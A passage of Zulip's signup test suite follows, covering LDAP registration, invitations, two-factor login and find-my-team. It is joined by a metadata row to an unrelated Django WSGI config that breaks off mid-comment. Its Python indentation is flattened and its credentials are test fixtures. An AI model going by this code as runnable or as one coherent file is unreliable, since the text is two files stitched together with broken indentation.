def test_signup_with_ldap_and_email_enabled_using_email_with_ldap_append_domain(self) -> None:
password = "nonldappassword"
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# If the user's email is inside the LDAP directory and we just
# have a wrong password, then we refuse to create an account
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 302)
# We get redirected back to the login page because password was wrong
self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
# For the rest of the test we delete the user from LDAP.
del self.mock_ldap.directory["uid=newuser,ou=users,dc=zulip,dc=com"]
# If the user's email is not in the LDAP directory, but fits LDAP_APPEND_DOMAIN,
# we refuse to create the account.
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
), self.assertLogs("zulip.ldap", "DEBUG") as debug_log:
result = self.submit_reg_form_for_user(
email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 302)
# We get redirected back to the login page because emails matching
# LDAP_APPEND_DOMAIN aren't allowed to create non-LDAP accounts.
self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
self.assertEqual(
debug_log.output,
[
"DEBUG:zulip.ldap:ZulipLDAPAuthBackend: No LDAP user matching django_to_ldap_username result: newuser. Input username: newuser@zulip.com"
],
)
# If the email is outside of LDAP_APPEND_DOMAIN, we successfully create a non-LDAP account,
# with the password managed in the Zulip database.
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="example.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
with self.assertLogs(level="WARNING") as m:
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
self.assertEqual(
m.output,
["WARNING:root:New account email newuser@zulip.com could not be found in LDAP"],
)
with self.assertLogs("zulip.ldap", "DEBUG") as debug_log:
result = self.submit_reg_form_for_user(
email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(
debug_log.output,
[
"DEBUG:zulip.ldap:ZulipLDAPAuthBackend: Email newuser@zulip.com does not match LDAP domain example.com."
],
)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "http://zulip.testserver/")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from the POST request, not LDAP
self.assertEqual(user_profile.full_name, "Non-LDAP Full Name")
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
"zproject.backends.ZulipDummyBackend",
)
)
def test_signup_with_ldap_and_email_enabled_using_email_with_ldap_email_search(self) -> None:
# If the user's email is inside the LDAP directory and we just
# have a wrong password, then we refuse to create an account
password = "nonldappassword"
email = "newuser_email@zulip.com" # belongs to user uid=newuser_with_email in the test directory
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_EMAIL_ATTR="mail",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 302)
# We get redirected back to the login page because password was wrong
self.assertEqual(result.url, "/accounts/login/?email=newuser_email%40zulip.com")
self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
# If the user's email is not in the LDAP directory, though, we
# successfully create an account with a password in the Zulip
# database.
password = "nonldappassword"
email = "nonexistent@zulip.com"
subdomain = "zulip"
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_EMAIL_ATTR="mail",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
with self.assertLogs(level="WARNING") as m:
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
self.assertEqual(
m.output,
[
"WARNING:root:New account email nonexistent@zulip.com could not be found in LDAP"
],
)
with self.assertLogs("zulip.ldap", "DEBUG") as debug_log:
result = self.submit_reg_form_for_user(
email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(
debug_log.output,
[
"DEBUG:zulip.ldap:ZulipLDAPAuthBackend: No LDAP user matching django_to_ldap_username result: nonexistent@zulip.com. Input username: nonexistent@zulip.com"
],
)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "http://zulip.testserver/")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from the POST request, not LDAP
self.assertEqual(user_profile.full_name, "Non-LDAP Full Name")
def ldap_invite_and_signup_as(
self, invite_as: int, streams: Sequence[str] = ["Denmark"]
) -> None:
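"""
Invite newuser@zulip.com with the given role and streams, then
complete an LDAP-based registration for the invited account.
"""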
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
subdomain = "zulip"
email = "newuser@zulip.com"
password = self.ldap_password("newuser")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
with self.assertLogs("zulip.ldap", "DEBUG") as debug_log:
# Invite user.
self.login("iago")
self.assertEqual(
debug_log.output,
[
"DEBUG:zulip.ldap:ZulipLDAPAuthBackend: No LDAP user matching django_to_ldap_username result: iago. Input username: iago@zulip.com"
],
)
response = self.invite(
invitee_emails="newuser@zulip.com", stream_names=streams, invite_as=invite_as
)
self.assert_json_success(response)
self.logout()
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 302)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
)
)
def test_ldap_invite_user_as_admin(self) -> None:
self.ldap_invite_and_signup_as(PreregistrationUser.INVITE_AS["REALM_ADMIN"])
user_profile = UserProfile.objects.get(delivery_email=self.nonreg_email("newuser"))
self.assertTrue(user_profile.is_realm_admin)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
)
)
def test_ldap_invite_user_as_guest(self) -> None:
self.ldap_invite_and_signup_as(PreregistrationUser.INVITE_AS["GUEST_USER"])
user_profile = UserProfile.objects.get(delivery_email=self.nonreg_email("newuser"))
self.assertTrue(user_profile.is_guest)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
)
)
def test_ldap_invite_streams(self) -> None:
stream_name = "Rome"
realm = get_realm("zulip")
stream = get_stream(stream_name, realm)
default_streams = get_default_streams_for_realm(realm)
default_streams_name = [stream.name for stream in default_streams]
self.assertNotIn(stream_name, default_streams_name)
# Invite user.
self.ldap_invite_and_signup_as(
PreregistrationUser.INVITE_AS["REALM_ADMIN"], streams=[stream_name]
)
user_profile = UserProfile.objects.get(delivery_email=self.nonreg_email("newuser"))
self.assertTrue(user_profile.is_realm_admin)
sub = get_stream_subscriptions_for_user(user_profile).filter(recipient__type_id=stream.id)
self.assert_length(sub, 1)
def test_registration_when_name_changes_are_disabled(self) -> None:
"""
Test `name_changes_disabled` when we are not running under LDAP.
"""
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with patch("zerver.views.registration.name_changes_disabled", return_value=True):
result = self.submit_reg_form_for_user(
email,
password,
full_name="New Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
user_profile = UserProfile.objects.get(delivery_email=email)
# 'New Name' comes from POST data; not from LDAP session.
self.assertEqual(user_profile.full_name, "New Name")
def test_realm_creation_through_ldap(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
realm_name = "Zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
match = re.search(settings.EXTERNAL_HOST + r"(\S+)>", message.body)
assert match is not None
[confirmation_url] = match.groups()
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTHENTICATION_BACKENDS=("zproject.backends.ZulipLDAPAuthBackend",),
TERMS_OF_SERVICE=False,
):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
key = find_key_by_email(email)
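# Flip the pending registration into realm-creation mode so the form
# below accepts realm_name and realm_subdomain.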
confirmation = Confirmation.objects.get(confirmation_key=key)
prereg_user = confirmation.content_object
prereg_user.realm_creation = True
prereg_user.save()
result = self.submit_reg_form_for_user(
email,
password,
realm_name=realm_name,
realm_subdomain=subdomain,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assert_in_success_response(
["We just need you to do one last thing.", "newuser@zulip.com"], result
)
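# The Zephyr mirror realm looks up MIT users via Hesiod; mock the DNS
# lookup to return a passwd-style entry for sipbtest, from which the
# full name ("Fred Sipb") can be derived.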
@patch(
"DNS.dnslookup",
return_value=[["sipbtest:*:20922:101:Fred Sipb,,,:/mit/sipbtest:/bin/athena/tcsh"]],
)
def test_registration_of_mirror_dummy_user(self, ignored: Any) -> None:
password = "test"
subdomain = "zephyr"
user_profile = self.mit_user("sipbtest")
email = user_profile.delivery_email
user_profile.is_mirror_dummy = True
user_profile.save()
change_user_is_active(user_profile, False)
result = self.client_post("/register/", {"email": email}, subdomain="zephyr")
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"], subdomain="zephyr")
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
match = re.search(settings.EXTERNAL_HOST + r"(\S+)>", message.body)
assert match is not None
[confirmation_url] = match.groups()
break
else:
raise AssertionError("Couldn't find a confirmation email.")
result = self.client_get(confirmation_url, subdomain="zephyr")
self.assertEqual(result.status_code, 200)
# If the mirror dummy user is already active, attempting to
# submit the registration form should raise an AssertionError
# (this is an invalid state, so it's a bug if we get here):
change_user_is_active(user_profile, True)
with self.assertRaisesRegex(
AssertionError, "Mirror dummy user is already active!"
), self.assertLogs("django.request", "ERROR") as error_log:
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertTrue(
"ERROR:django.request:Internal Server Error: /accounts/register/" in error_log.output[0]
)
self.assertTrue(
'raise AssertionError("Mirror dummy user is already active!' in error_log.output[0]
)
self.assertTrue(
"AssertionError: Mirror dummy user is already active!" in error_log.output[0]
)
change_user_is_active(user_profile, False)
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 302)
self.assert_logged_in_user_id(user_profile.id)
@patch(
"DNS.dnslookup",
return_value=[["sipbtest:*:20922:101:Fred Sipb,,,:/mit/sipbtest:/bin/athena/tcsh"]],
)
def test_registration_of_active_mirror_dummy_user(self, ignored: Any) -> None:
"""
Trying to activate an already-active mirror dummy user should
raise an AssertionError.
"""
user_profile = self.mit_user("sipbtest")
email = user_profile.delivery_email
user_profile.is_mirror_dummy = True
user_profile.save()
change_user_is_active(user_profile, True)
with self.assertRaisesRegex(
AssertionError, "Mirror dummy user is already active!"
), self.assertLogs("django.request", "ERROR") as error_log:
self.client_post("/register/", {"email": email}, subdomain="zephyr")
self.assertTrue(
"ERROR:django.request:Internal Server Error: /register/" in error_log.output[0]
)
self.assertTrue(
'raise AssertionError("Mirror dummy user is already active!' in error_log.output[0]
)
self.assertTrue(
"AssertionError: Mirror dummy user is already active!" in error_log.output[0]
)
@override_settings(TERMS_OF_SERVICE=False)
def test_dev_user_registration(self) -> None:
"""Verify that /devtools/register_user creates a new user, logs them
in, and redirects to the logged-in app."""
count = UserProfile.objects.count()
email = f"user-{count}@zulip.com"
result = self.client_post("/devtools/register_user/")
user_profile = UserProfile.objects.all().order_by("id").last()
self.assertEqual(result.status_code, 302)
self.assertEqual(user_profile.delivery_email, email)
self.assertEqual(result["Location"], "http://zulip.testserver/")
self.assert_logged_in_user_id(user_profile.id)
@override_settings(TERMS_OF_SERVICE=False)
def test_dev_user_registration_create_realm(self) -> None:
count = UserProfile.objects.count()
string_id = f"realm-{count}"
result = self.client_post("/devtools/register_realm/")
self.assertEqual(result.status_code, 302)
self.assertTrue(
result["Location"].startswith(f"http://{string_id}.testserver/accounts/login/subdomain")
)
result = self.client_get(result["Location"], subdomain=string_id)
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], f"http://{string_id}.testserver")
user_profile = UserProfile.objects.all().order_by("id").last()
self.assert_logged_in_user_id(user_profile.id)
class DeactivateUserTest(ZulipTestCase):
def test_deactivate_user(self) -> None:
user = self.example_user("hamlet")
email = user.email
self.login_user(user)
self.assertTrue(user.is_active)
result = self.client_delete("/json/users/me")
self.assert_json_success(result)
user = self.example_user("hamlet")
self.assertFalse(user.is_active)
password = initial_password(email)
assert password is not None
self.assert_login_failure(email, password=password)
def test_do_not_deactivate_final_owner(self) -> None:
user = self.example_user("desdemona")
user_2 = self.example_user("iago")
self.login_user(user)
self.assertTrue(user.is_active)
result = self.client_delete("/json/users/me")
self.assert_json_error(result, "Cannot deactivate the only organization owner.")
user = self.example_user("desdemona")
self.assertTrue(user.is_active)
self.assertTrue(user.is_realm_owner)
do_change_user_role(user_2, UserProfile.ROLE_REALM_OWNER, acting_user=None)
self.assertTrue(user_2.is_realm_owner)
result = self.client_delete("/json/users/me")
self.assert_json_success(result)
do_change_user_role(user, UserProfile.ROLE_REALM_OWNER, acting_user=None)
def test_do_not_deactivate_final_user(self) -> None:
realm = get_realm("zulip")
for user_profile in UserProfile.objects.filter(realm=realm).exclude(
role=UserProfile.ROLE_REALM_OWNER
):
do_deactivate_user(user_profile, acting_user=None)
user = self.example_user("desdemona")
self.login_user(user)
result = self.client_delete("/json/users/me")
self.assert_json_error(result, "Cannot deactivate the only user.")
class TestLoginPage(ZulipTestCase):
@patch("django.http.HttpRequest.get_host")
def test_login_page_redirects_for_root_alias(self, mock_get_host: MagicMock) -> None:
mock_get_host.return_value = "www.testserver"
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/")
result = self.client_get("/en/login/", {"next": "/upgrade/"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/?next=%2Fupgrade%2F")
@patch("django.http.HttpRequest.get_host")
def test_login_page_redirects_for_root_domain(self, mock_get_host: MagicMock) -> None:
mock_get_host.return_value = "testserver"
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/")
result = self.client_get("/en/login/", {"next": "/upgrade/"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/?next=%2Fupgrade%2F")
mock_get_host.return_value = "www.testserver.com"
with self.settings(
ROOT_DOMAIN_LANDING_PAGE=True,
EXTERNAL_HOST="www.testserver.com",
ROOT_SUBDOMAIN_ALIASES=["test"],
):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/")
result = self.client_get("/en/login/", {"next": "/upgrade/"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/?next=%2Fupgrade%2F")
@patch("django.http.HttpRequest.get_host")
def test_login_page_works_without_subdomains(self, mock_get_host: MagicMock) -> None:
mock_get_host.return_value = "www.testserver"
with self.settings(ROOT_SUBDOMAIN_ALIASES=["www"]):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 200)
mock_get_host.return_value = "testserver"
with self.settings(ROOT_SUBDOMAIN_ALIASES=["www"]):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 200)
def test_login_page_registration_hint(self) -> None:
response = self.client_get("/login/")
self.assert_not_in_success_response(
["Don't have an account yet? You need to be invited to join this organization."],
response,
)
realm = get_realm("zulip")
realm.invite_required = True
realm.save(update_fields=["invite_required"])
response = self.client_get("/login/")
self.assert_in_success_response(
["Don't have an account yet? You need to be invited to join this organization."],
response,
)
class TestFindMyTeam(ZulipTestCase):
def test_template(self) -> None:
result = self.client_get("/accounts/find/")
self.assertIn("Find your Zulip accounts", result.content.decode("utf8"))
def test_result(self) -> None:
# We capitalize a letter in cordelia's email to test that the search is case-insensitive.
result = self.client_post(
"/accounts/find/", dict(emails="iago@zulip.com,cordeliA@zulip.com")
)
self.assertEqual(result.status_code, 302)
self.assertEqual(
result.url, "/accounts/find/?emails=iago%40zulip.com%2CcordeliA%40zulip.com"
)
result = self.client_get(result.url)
content = result.content.decode("utf8")
self.assertIn("Emails sent! You will only receive emails", content)
self.assertIn("iago@zulip.com", content)
self.assertIn("cordeliA@zulip.com", content)
from django.core.mail import outbox
# 3 = 1 + 2 -- Cordelia gets an email each for the "zulip" and "lear" realms.
self.assert_length(outbox, 3)
def test_find_team_ignore_invalid_email(self) -> None:
result = self.client_post(
"/accounts/find/", dict(emails="iago@zulip.com,invalid_email@zulip.com")
)
self.assertEqual(result.status_code, 302)
self.assertEqual(
result.url, "/accounts/find/?emails=iago%40zulip.com%2Cinvalid_email%40zulip.com"
)
result = self.client_get(result.url)
content = result.content.decode("utf8")
self.assertIn("Emails sent! You will only receive emails", content)
self.assertIn(self.example_email("iago"), content)
self.assertIn("invalid_email@", content)
from django.core.mail import outbox
self.assert_length(outbox, 1)
def test_find_team_reject_invalid_email(self) -> None:
result = self.client_post("/accounts/find/", dict(emails="invalid_string"))
self.assertEqual(result.status_code, 200)
self.assertIn(b"Enter a valid email", result.content)
from django.core.mail import outbox
self.assert_length(outbox, 0)
# Just for coverage on perhaps-unnecessary validation code.
result = self.client_get("/accounts/find/", {"emails": "invalid"})
self.assertEqual(result.status_code, 200)
def test_find_team_zero_emails(self) -> None:
data = {"emails": ""}
result = self.client_post("/accounts/find/", data)
self.assertIn("This field is required", result.content.decode("utf8"))
self.assertEqual(result.status_code, 200)
from django.core.mail import outbox
self.assert_length(outbox, 0)
def test_find_team_one_email(self) -> None:
data = {"emails": self.example_email("hamlet")}
result = self.client_post("/accounts/find/", data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=hamlet%40zulip.com")
from django.core.mail import outbox
self.assert_length(outbox, 1)
def test_find_team_deactivated_user(self) -> None:
do_deactivate_user(self.example_user("hamlet"), acting_user=None)
data = {"emails": self.example_email("hamlet")}
result = self.client_post("/accounts/find/", data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=hamlet%40zulip.com")
from django.core.mail import outbox
self.assert_length(outbox, 0)
def test_find_team_deactivated_realm(self) -> None:
do_deactivate_realm(get_realm("zulip"), acting_user=None)
data = {"emails": self.example_email("hamlet")}
result = self.client_post("/accounts/find/", data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=hamlet%40zulip.com")
from django.core.mail import outbox
self.assert_length(outbox, 0)
def test_find_team_bot_email(self) -> None:
data = {"emails": self.example_email("webhook_bot")}
result = self.client_post("/accounts/find/", data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=webhook-bot%40zulip.com")
from django.core.mail import outbox
self.assert_length(outbox, 0)
def test_find_team_more_than_ten_emails(self) -> None:
data = {"emails": ",".join(f"hamlet-{i}@zulip.com" for i in range(11))}
result = self.client_post("/accounts/find/", data)
self.assertEqual(result.status_code, 200)
self.assertIn("Please enter at most 10", result.content.decode("utf8"))
from django.core.mail import outbox
self.assert_length(outbox, 0)
class ConfirmationKeyTest(ZulipTestCase):
def test_confirmation_key(self) -> None:
request = MagicMock()
request.session = {
"confirmation_key": {"confirmation_key": "xyzzy"},
}
result = confirmation_key(request)
self.assert_json_success(result)
self.assert_in_response("xyzzy", result)
class MobileAuthOTPTest(ZulipTestCase):
def test_xor_hex_strings(self) -> None:
self.assertEqual(xor_hex_strings("1237c81ab", "18989fd12"), "0aaf57cb9")
with self.assertRaises(AssertionError):
xor_hex_strings("1", "31")
def test_is_valid_otp(self) -> None:
self.assertEqual(is_valid_otp("1234"), False)
self.assertEqual(is_valid_otp("1234abcd" * 8), True)
self.assertEqual(is_valid_otp("1234abcZ" * 8), False)
def test_ascii_to_hex(self) -> None:
self.assertEqual(ascii_to_hex("ZcdR1234"), "5a63645231323334")
self.assertEqual(hex_to_ascii("5a63645231323334"), "ZcdR1234")
def test_otp_encrypt_api_key(self) -> None:
api_key = "12ac" * 8
otp = "7be38894" * 8
result = otp_encrypt_api_key(api_key, otp)
self.assertEqual(result, "4ad1e9f7" * 8)
decrypted = otp_decrypt_api_key(result, otp)
self.assertEqual(decrypted, api_key)
class FollowupEmailTest(ZulipTestCase):
def test_followup_day2_email(self) -> None:
user_profile = self.example_user("hamlet")
# Test date_joined == Sunday
user_profile.date_joined = datetime.datetime(
2018, 1, 7, 1, 0, 0, 0, tzinfo=datetime.timezone.utc
)
self.assertEqual(
followup_day2_email_delay(user_profile), datetime.timedelta(days=2, hours=-1)
)
# Test date_joined == Tuesday
user_profile.date_joined = datetime.datetime(
2018, 1, 2, 1, 0, 0, 0, tzinfo=datetime.timezone.utc
)
self.assertEqual(
followup_day2_email_delay(user_profile), datetime.timedelta(days=2, hours=-1)
)
# Test date_joined == Thursday
user_profile.date_joined = datetime.datetime(
2018, 1, 4, 1, 0, 0, 0, tzinfo=datetime.timezone.utc
)
self.assertEqual(
followup_day2_email_delay(user_profile), datetime.timedelta(days=1, hours=-1)
)
# Test date_joined == Friday
user_profile.date_joined = datetime.datetime(
2018, 1, 5, 1, 0, 0, 0, tzinfo=datetime.timezone.utc
)
self.assertEqual(
followup_day2_email_delay(user_profile), datetime.timedelta(days=3, hours=-1)
)
# Time offset of America/Phoenix is -07:00
user_profile.timezone = "America/Phoenix"
# Test date_joined == Friday in UTC, but Thursday in the user's timezone
user_profile.date_joined = datetime.datetime(
2018, 1, 5, 1, 0, 0, 0, tzinfo=datetime.timezone.utc
)
self.assertEqual(
followup_day2_email_delay(user_profile), datetime.timedelta(days=1, hours=-1)
)
class NoReplyEmailTest(ZulipTestCase):
def test_noreply_email_address(self) -> None:
self.assertTrue(
re.search(self.TOKENIZED_NOREPLY_REGEX, FromAddress.tokenized_no_reply_address())
)
with self.settings(ADD_TOKENS_TO_NOREPLY_ADDRESS=False):
self.assertEqual(FromAddress.tokenized_no_reply_address(), "noreply@testserver")
class TwoFactorAuthTest(ZulipTestCase):
@patch("two_factor.models.totp")
def test_two_factor_login(self, mock_totp: MagicMock) -> None:
token = 123456
email = self.example_email("hamlet")
password = self.ldap_password("hamlet")
user_profile = self.example_user("hamlet")
user_profile.set_password(password)
user_profile.save()
self.create_default_device(user_profile)
def totp(*args: Any, **kwargs: Any) -> int:
return token
mock_totp.side_effect = totp
with self.settings(
AUTHENTICATION_BACKENDS=("zproject.backends.EmailAuthBackend",),
TWO_FACTOR_CALL_GATEWAY="two_factor.gateways.fake.Fake",
TWO_FACTOR_SMS_GATEWAY="two_factor.gateways.fake.Fake",
TWO_FACTOR_AUTHENTICATION_ENABLED=True,
):
first_step_data = {
"username": email,
"password": password,
"two_factor_login_view-current_step": "auth",
}
with self.assertLogs("two_factor.gateways.fake", "INFO") as info_logs:
result = self.client_post("/accounts/login/", first_step_data)
self.assertEqual(
info_logs.output,
['INFO:two_factor.gateways.fake:Fake SMS to +12125550100: "Your token is: 123456"'],
)
self.assertEqual(result.status_code, 200)
second_step_data = {
"token-otp_token": str(token),
"two_factor_login_view-current_step": "token",
}
result = self.client_post("/accounts/login/", second_step_data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "http://zulip.testserver")
# Going to login page should redirect to '/' if user is already
# logged in.
result = self.client_get("/accounts/login/")
self.assertEqual(result["Location"], "http://zulip.testserver")
class NameRestrictionsTest(ZulipTestCase):
def test_whitelisted_disposable_domains(self) -> None:
self.assertFalse(is_disposable_domain("OPayQ.com"))
class RealmRedirectTest(ZulipTestCase):
def test_realm_redirect_without_next_param(self) -> None:
result = self.client_get("/accounts/go/")
self.assert_in_success_response(["Enter your organization's Zulip URL"], result)
result = self.client_post("/accounts/go/", {"subdomain": "zephyr"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "http://zephyr.testserver")
result = self.client_post("/accounts/go/", {"subdomain": "invalid"})
self.assert_in_success_response(["We couldn't find that Zulip organization."], result)
def test_realm_redirect_with_next_param(self) -> None:
result = self.client_get("/accounts/go/", {"next": "billing"})
self.assert_in_success_response(
["Enter your organization's Zulip URL", 'action="/accounts/go/?next=billing"'], result
)
result = self.client_post("/accounts/go/?next=billing", {"subdomain": "lear"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "http://lear.testserver/billing")
|
punchagan/zulip
|
zerver/tests/test_signup.py
|
Python
|
apache-2.0
| 225,136 | 0.002394 |
"""
WSGI config for billboards project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "billboards.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "billboards.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
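# A minimal sketch of the custom-WSGI-middleware idea described in the
# docstring above: a plain WSGI callable that delegates to the Django
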